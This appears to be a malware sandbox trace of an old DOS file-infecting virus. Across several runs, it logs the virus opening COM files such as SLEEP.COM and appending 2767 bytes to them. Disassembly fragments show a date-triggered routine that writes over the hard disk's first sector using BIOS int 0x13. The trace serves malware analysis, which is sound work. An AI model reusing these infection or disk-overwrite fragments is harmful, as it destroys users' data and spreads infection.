2018-12-25T11:52:08.364366183Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.370081446Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.380659411Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.387066602Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.38828329Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.394873845Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.404587942Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.406316114Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.410081111Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.415932916Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.42579689Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.437909102Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.43949426Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.446329534Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.448616364Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.451256077Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.452865355Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.455079379Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.461742767Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.463538636Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.473083379Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.474230225Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.476566298Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.478076969Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.479379039Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.485260495Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.49557342Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.500124163Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.501429971Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.504286308Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.510495126Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.511913105Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.519384993Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.521820112Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.526039533Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.978731317Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.980552539Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.982870296Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T11:52:08.128345209Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.131416345Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.134233317Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.141364032Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.14843822Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.178875954Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.186621761Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.188534882Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.197603976Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.209465804Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.212067018Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.216059623Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.222517252Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.235312649Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.245116097Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.247243501Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.255074517Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.268592086Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.270710646Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.27362558Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.280506695Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.294502066Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.302372806Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.304172646Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.312235482Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.320100702Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.321959611Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.324199547Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.331781523Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.339189474Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.344886125Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.34603059Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.350836454Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.358779617Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.36033751Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.362196995Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.367918911Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.387908616Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.402402454Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.40487997Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.412159089Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.423680849Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.426188573Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.430355802Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.436889032Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.447908579Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.457157241Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.458690701Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.466418143Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.478586983Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.480821366Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.483789315Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.491129392Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.502541592Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.510421566Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.512720788Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.521103054Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.535993414Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.537866755Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.54124122Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.548246529Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.559992527Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.568440482Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.571222628Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.578840117Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.581136629Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.583948729Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.585377472Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.590325773Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.598542515Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.600209228Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.608206203Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.609399008Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.611307624Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.612995352Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.614617101Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.624279359Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.637468946Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.643566884Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.645752617Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.649008364Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.65668742Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.658213254Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.672054271Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.675389418Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.679763095Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:54.611239599Z 48 PC: 14228 | Get DOS version
2018-12-25T13:06:54.612920766Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T13:06:54.614979035Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T13:06:54.737129848Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T13:06:54.739595968Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T13:06:54.741607343Z 78 PC: 14390 | Find first file
2018-12-25T13:06:54.747346912Z 67 PC: 1439d | Get or set file attributes
2018-12-25T13:06:54.754295339Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T13:06:54.768769934Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:06:54.775808836Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T13:06:54.777764764Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T13:06:54.78400288Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T13:06:54.793666152Z 62 PC: 143b9 | Close file
2018-12-25T13:06:54.795786629Z 79 PC: 143bd | Find next file
2018-12-25T13:06:54.798275112Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.803651572Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.813471368Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.819827555Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.821093341Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.827583642Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.840038488Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.841852916Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.856251855Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.863349599Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.873294956Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.88031729Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.8818301Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.888111024Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.898555663Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.900213352Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.90265816Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.913825132Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.923154822Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.92944206Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.931253331Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.93730523Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.94695639Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.94904308Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.951501596Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:54.95687323Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:54.969146519Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:54.976191666Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:54.977516522Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:54.984274147Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:54.993817351Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:54.995411883Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:54.998263858Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:55.003645304Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:55.012983269Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:55.01998518Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:55.021351931Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:55.027398447Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:55.205921113Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:55.207641966Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:55.210069374Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:55.216131499Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:55.383213081Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:55.389893921Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:55.392336883Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:55.398660728Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:55.506668772Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:55.509014321Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:55.51154656Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T13:06:55.706160354Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T13:06:55.876074116Z 61 PC: 143ca | Open file (See above)
2018-12-25T13:06:55.882684896Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T13:06:55.883977842Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T13:06:55.890874452Z 66 PC: 143fa | Move file pointer
2018-12-25T13:06:55.892178806Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T13:06:55.894572348Z 66 PC: 1440f | Move file pointer
2018-12-25T13:06:55.897388927Z 66 PC: 1442b | Move file pointer
2018-12-25T13:06:55.898716686Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T13:06:55.905102523Z 66 PC: 14453 | Move file pointer
2018-12-25T13:06:55.906547783Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T13:06:56.123968821Z 66 PC: 1446a | Move file pointer
2018-12-25T13:06:56.125762985Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T13:06:56.129108683Z 87 PC: 14480 | Get or set file date and time
2018-12-25T13:06:56.13182672Z 87 PC: 14488 | Get or set file date and time
2018-12-25T13:06:56.134122064Z 62 PC: 1448c | Close file
2018-12-25T13:06:56.244179647Z 67 PC: 14497 | Get or set file attributes
2018-12-25T13:06:56.430221691Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T13:06:56.433461832Z 62 PC: 143b9 | Close file (See above)
2018-12-25T13:06:56.434500183Z 79 PC: 143bd | Find next file (See above)
2018-12-25T13:06:56.436576984Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T13:06:56.439661346Z 48 PC: 12a8f | Get DOS version
2018-12-25T13:06:56.440467699Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T13:06:56.444534365Z 93 PC: 12afe | File sharing functions
2018-12-25T13:06:56.445679518Z 9 PC: 12a86 | Display string (See above)
2018-12-25T13:06:56.449087991Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.104589503Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.106534088Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.108785207Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.110962202Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.113588056Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.12053327Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.126655324Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.145830801Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.154146286Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.155585291Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.162752133Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.177891828Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.179825983Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.182653417Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.191153711Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.202182173Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.209624694Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.216241478Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.223788181Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.235862728Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.240901914Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.243957402Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.249730199Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.264103325Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.271865865Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.273404641Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.284112553Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.320716784Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.32347128Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.32947241Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.336817181Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.348027242Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.356815263Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.369662416Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.377453896Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.390171405Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.393542029Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.396900334Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.403713792Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.424998332Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.432966278Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.43449978Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.440913975Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.448320126Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.449877041Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.451978247Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.45661813Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.465743439Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.47168278Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.474148655Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.479537384Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.494179414Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.497381392Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.505309673Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.511727846Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.524690638Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.532965952Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.534984893Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.54282653Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.555034325Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.557962002Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.560959698Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.575672756Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.586714226Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.594571328Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.597797638Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.605773009Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.607587689Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.612390318Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.614680984Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.616718824Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.625612867Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.627475286Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.63728244Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.639567852Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.644262602Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.646298102Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.648459122Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.660052143Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.677378686Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.682599558Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.685129268Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.687879135Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.694810187Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.697465336Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.704596919Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.706767346Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.712458256Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

